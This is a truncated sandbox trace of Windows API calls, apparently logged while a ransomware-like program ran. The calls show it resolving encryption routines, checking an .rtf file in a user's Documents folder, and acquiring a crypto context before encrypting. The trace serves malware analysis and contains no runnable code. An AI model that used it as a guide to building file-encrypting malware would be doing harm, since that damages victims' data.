HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0033.443] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0033.443] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0033.443] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0033.443] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0033.443] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0033.443] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0033.443] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0033.443] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0033.443] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0033.443] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0033.443] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.443] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0033.443] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0033.443] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.443] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.443] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rtf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.443] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".rtf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0033.443] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.443] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.443] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.443] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5cad190, ftCreationTime.dwHighDateTime=0x1d5c5b8, ftLastAccessTime.dwLowDateTime=0x19d8b490, ftLastAccessTime.dwHighDateTime=0x1d5b8ed, ftLastWriteTime.dwLowDateTime=0x19d8b490, ftLastWriteTime.dwHighDateTime=0x1d5b8ed, nFileSizeHigh=0x0, nFileSizeLow=0x12790, dwReserved0=0x0, dwReserved1=0x777648, cFileName="fe6eMKi1FTxh0MxK.rtf", cAlternateFileName="FE6EMK~1.RTF")) returned 0x7c20c0 [0033.443] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0033.444] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.444] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5cad190, ftCreationTime.dwHighDateTime=0x1d5c5b8, ftLastAccessTime.dwLowDateTime=0x19d8b490, ftLastAccessTime.dwHighDateTime=0x1d5b8ed, ftLastWriteTime.dwLowDateTime=0x19d8b490, ftLastWriteTime.dwHighDateTime=0x1d5b8ed, nFileSizeHigh=0x0, nFileSizeLow=0x12790, dwReserved0=0x0, dwReserved1=0x777648, cFileName="fe6eMKi1FTxh0MxK.rtf", cAlternateFileName="FE6EMK~1.RTF")) returned 0x7c20c0 [0033.444] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0033.444] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\LkOIQE-AmAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\LkOIQE-AmAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\LkOIQE-AmAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\LkOIQE-AmAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\LkOIQE-AmAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\LkOIQE-AmAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\LkOIQE-AmAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\LkOIQE-AmAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LkOIQE-AmAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LkOIQE-AmAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kOIQE-AmAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OIQE-AmAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IQE-AmAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QE-AmAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E-AmAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-AmAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AmAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D\\007meSo66\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\007meSo66\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="007meSo66\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="07meSo66\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7meSo66\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="meSo66\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eSo66\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="So66\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o66\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="66\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fe6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eMKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MKi1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ki1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FTxh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Txh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xh0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0MxK.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.446] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.446] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0033.446] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0033.446] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0033.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rtf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".rtf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0033.446] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0033.446] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0033.446] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0033.446] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0033.447] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5cad190, ftCreationTime.dwHighDateTime=0x1d5c5b8, ftLastAccessTime.dwLowDateTime=0x19d8b490, ftLastAccessTime.dwHighDateTime=0x1d5b8ed, ftLastWriteTime.dwLowDateTime=0x19d8b490, ftLastWriteTime.dwHighDateTime=0x1d5b8ed, nFileSizeHigh=0x0, nFileSizeLow=0x12790, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="fe6eMKi1FTxh0MxK.rtf", cAlternateFileName="FE6EMK~1.RTF")) returned 0x7c2100 [0033.447] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0033.447] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0033.447] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.447] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0033.447] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0033.447] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.447] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.447] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0033.448] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0033.448] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0033.448] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0033.448] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0033.448] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.448] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0033.448] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.448] CharUpperBuffW (in: 